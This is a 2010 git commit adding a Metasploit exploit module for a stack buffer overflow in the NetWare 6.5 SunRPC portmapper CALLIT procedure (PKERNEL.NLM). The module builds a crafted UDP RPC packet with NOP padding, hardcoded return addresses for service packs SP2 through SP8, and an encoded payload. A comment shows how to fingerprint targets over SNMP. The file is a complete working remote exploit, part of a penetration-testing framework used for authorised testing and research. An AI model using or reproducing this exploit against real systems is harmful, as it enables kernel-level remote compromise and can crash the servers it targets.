Merge in an exploit for the Novell NetWare SunRPC CALLIT overflow. Thanks!

git-svn-id: file:///home/svn/framework3/trunk@11018 4d416f70-5f16-0410-b530-b9f4589650da
2010-11-13 04:53:51 +00:00 · 2010-11-13 04:53:51 +00:00 · 062d0506aa
parent cae748efa5
commit 062d0506aa
1 changed files with 92 additions and 0 deletions
--- a/modules/exploits/netware/sunrpc/pkernel_callit.rb
+++ b/modules/exploits/netware/sunrpc/pkernel_callit.rb
@ -0,0 +1,92 @@
+##
+# NetWare 6.5 NFS - Portmapper and RPC Module Buffer Overflow (CALLIT procedure)
+##
+
+
+require 'msf/core'
+
+
+class Metasploit3 < Msf::Exploit::Remote
+
+	include Msf::Exploit::Remote::Udp
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'NetWare 6.5 SunRPC Portmapper CALLIT Stack Buffer Overflow',
+			'Description'    => %q{
+				This module exploits a stack buffer overflow in the NetWare PKERNEL.NLM driver's CALLIT procedure.
+				PKERNEL.NLM is installed by default on all NetWare servers to support NFS.
+				The PKERNEL.NLM module runs in kernel mode so a failed exploit attempt can
+				cause the operating system to reboot.
+			},
+			'Author'         => [ 'pahtzo', ],
+			'License'        => MSF_LICENSE,
+			'Version'        => '$Revision$',
+			'References'     =>
+				[
+					# There is no CVE for this vulnerability
+					[ 'BID', '36564' ],
+					[ 'OSVDB', '58447' ],
+					[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-09-067/' ],
+				],
+			'Privileged'     => true,
+			'Payload'        =>
+				{
+					'Space'    => 2020,
+				},
+			'Platform'       => 'netware',
+			'Targets'        =>
+				[
+					# NetWare SP and PKERNEL.NLM version can be found in SNMP:
+					# snmpwalk -Os -c public -v 1 [target hostname] | egrep -i "sysdescr|pkernel.nlm"
+					# sysDescr.0 = STRING: Novell NetWare 5.70.08  October 3, 2008
+					# hrSWRunName.1191394992 = STRING: "PKERNEL.NLM  v15.01  (20081014)"
+					[ 'NetWare 6.5 SP2', { 'Ret' => 0xb2329b98 } ], # push esp - ret (libc.nlm)
+					[ 'NetWare 6.5 SP3', { 'Ret' => 0xb234a268 } ], # push esp - ret (libc.nlm)
+					[ 'NetWare 6.5 SP4', { 'Ret' => 0xbabc286c } ], # push esp - ret (libc.nlm)
+					[ 'NetWare 6.5 SP5', { 'Ret' => 0xbabc9c3c } ], # push esp - ret (libc.nlm)
+					[ 'NetWare 6.5 SP6', { 'Ret' => 0x823c835c } ], # push esp - ret (libc.nlm)
+					[ 'NetWare 6.5 SP7', { 'Ret' => 0x823c83fc } ], # push esp - ret (libc.nlm)
+					[ 'NetWare 6.5 SP8', { 'Ret' => 0x823C870C } ], # push esp - ret (libc.nlm)
+				],
+
+			'DisclosureDate' => 'Oct 01 2009'))
+
+		register_options([Opt::RPORT(111)], self.class)
+	end
+
+	def exploit
+		connect_udp
+
+		buf =  [rand(0xffffffff)].pack('N') # XID
+		buf << [0].pack('N')                # Message Type: Call (0)
+		buf << [2].pack('N')                # RPC Version: 2
+		buf << [100000].pack('N')           # Program: Portmap (100000)
+		buf << [2].pack('N')                # Program Version: 2
+		buf << [5].pack('N')                # Procedure: CALLIT (5)
+		buf << [0].pack('N')                # Credentials AUTH_NULL (0)
+		buf << [0].pack('N')                # Length: 0
+		buf << [0].pack('N')                # Verifier AUTH_NULL (0)
+		buf << [0].pack('N')                # Length: 0
+		buf << [0].pack('N')                # Program: Unknown (0)
+		buf << [1].pack('N')                # Version: 1
+		buf << [1].pack('N')                # Procedure: proc-1 (1)
+		buf << [4097].pack('N')             # Arguments: <DATA> length: 4097
+
+		buf << make_nops(2072)              # fill to ret
+		buf << [target.ret].pack('V')       # addr. of push esp - ret
+		buf << payload.encoded              #
+
+#        print_status("payload space #{payload_space()}...")
+#        print_status("payload len #{payload.encoded.length}...")
+#        print_status("total buf len #{buf.length}...")
+
+		print_status("Trying target #{target.name}...")
+
+		udp_sock.put(buf)
+		handler
+		disconnect_udp
+	end
+
+end
+